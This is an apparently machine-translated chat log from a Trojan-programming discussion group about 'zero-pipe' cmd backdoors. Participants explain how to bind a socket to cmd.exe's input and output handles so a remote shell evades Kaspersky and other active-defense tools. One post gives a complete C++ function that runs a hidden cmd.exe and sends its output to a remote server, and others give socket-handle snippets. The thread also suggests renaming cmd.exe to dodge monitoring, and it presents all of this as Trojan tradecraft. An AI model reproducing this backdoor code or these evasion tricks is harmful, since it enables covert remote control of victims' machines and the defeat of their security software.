Technical Discussion about zero-pipe cmd Backdoor

Source: Internet
Author: User

Cold wind
Let's take a closer look at zero pipe ........

. μ P 2 breeze
This is not just Kaspersky, but basically all active defenses !!
Packet port SSM, micropoints ,,,

Xicao
Hot Patching

. μ P 2 breeze
Yes ..

Cold wind
Replace the input and output handles directly with a socket to implement zero pipe

Sulwan
Revolutionizing core programming

. μ P 2 breeze
I use a zero-pipe network ..

Phantom
si.hStdInput = hrp1;
si.hStdOutput = hwp2;

Phantom
It's a handle

. μ P 2 breeze
Haha, I have a little bit of information, but I cannot understand it !!

Phantom
Is socket an integer?

Xicao
Anti-DDoS Pro has been introduced in articles

Xicao
SOCKET is an unsigned long

Phantom
Yes
You mean
si.hStdInput = sock1;
si.hStdOutput = sock1;

Sulwan
Integer

Lenk
Pipeline communication?

Sulwan
Yes

Sulwan
SOCKET socket(
    int af,
    int type,
    int protocol
);
Can this be understood?

Cold wind
Haha understand ....

. μ P 2 breeze

// Class name is garbled in the original post; CCmdLine is a reconstruction.
// Assumes an ANSI (non-UNICODE) build, since TCHAR is mixed with strcat.
int CCmdLine::DosShell(char *command)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    HANDLE hRead = NULL, hWrite = NULL;

    TCHAR cmdLine[300] = {0};      // command line buffer
    BYTE sendBuf[2048] = {0};      // sending buffer
    SECURITY_ATTRIBUTES sa;        // security attributes
    DWORD bytesRead = 0;
    std::string strBuffer;         // declared but unused in the original post

    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE;      // pipe handles must be inheritable by the child process

    // Create an anonymous pipe
    if (!CreatePipe(&hRead, &hWrite, &sa, 0))
        goto clean;                // failed

    si.cb = sizeof(STARTUPINFO);
    GetStartupInfo(&si);
    si.hStdError = hWrite;
    si.hStdOutput = hWrite;        // process (cmd) output is written into the pipe
    si.wShowWindow = SW_HIDE;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

    GetSystemDirectory(cmdLine, sizeof(cmdLine)); // obtain the system directory
    strcat(cmdLine, "\\cmd.exe /C ");             // concatenate cmd
    strcat(cmdLine, command);                      // concatenate the complete cmd command
    // Create the process, i.e. execute the cmd command
    if (!CreateProcess(NULL, cmdLine, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
        goto clean;                // failed
    CloseHandle(pi.hThread);       // the process keeps running; only the handles are released
    CloseHandle(pi.hProcess);
    CloseHandle(hWrite);           // close the parent's write end so ReadFile sees EOF when cmd exits
    hWrite = NULL;                 // prevent a double close at clean:

    while (true)
    {
        // Read the pipe in a loop until it is drained; ReadFile fails once the
        // last write handle is closed and no data remains
        if (ReadFile(hRead, sendBuf, sizeof(sendBuf), &bytesRead, NULL) == 0)
            break;
        m_hServer->Send(sendBuf, bytesRead); // m_hServer is a class member not shown in the post
        memset(sendBuf, 0, sizeof(sendBuf)); // clear the buffer
        Sleep(100);                          // take a break
    }
clean:
    if (hRead != NULL)
        CloseHandle(hRead);

    if (hWrite != NULL)
        CloseHandle(hWrite);

    return true;
}

Phantom
What does this code mean?

Phantom
Zero pipe?

. μ P 2 breeze
Zero pipe !!

Xicao
It's to forcibly cast the socket to the HANDLE type

Phantom
Isn't it?

. μ P 2 breeze
What is Xi Cao talking about ??

Xicao
I'm just saying that there is no pipe.

. μ P 2 breeze
Haha, you have tested it yourself, but Kaspersky ..

Xicao
After the installation, you can set beibei.exe to abc.exe.

Phantom
(hWrite); it's useless.

Sulwan
Is your memory consumption high?

Xicao
StartupInfo.hStdInput = (HANDLE)sClient;

Phantom
You can use beibei.exe as abc.exe. -- it seems useless. I am still prompted when I use it like this.

. μ P 2 breeze

It's not my understanding that there is no pipe ..
It only creates one pipe, while the code Kaspersky monitors for creates two pipes ,,
It's not about the socket !!! You copy cmd under another name to get past its monitoring ..

Xicao
No pipe is required.

Lenk
Come back later. Friends, discuss it slowly

. μ P 2 breeze
His process is to create cmd, then execute the command, read the data from the pipe, and close the pipe !! Send the data that was read!

. μ P 2 breeze
Dizzy, do you think I have understood it wrong ??

Sulwan
Khan! I would never have thought of that! Learned something new

Xicao
CreatePipe is no longer used for zero pipe.
The socket directly takes over the input and output handles

. μ P 2 breeze
Okay, I'll go back and look at the materials... and there's no need to argue. It's just a good Trojan for getting past Kaspersky... haha !!

Blackfeather
Hurry to learn ···

To sum up the thread, zero pipe can be understood as Phantom put it:
si.hStdInput = sock1;
si.hStdOutput = sock1;

By Trojan Programming Technology Discussion group (44390702)
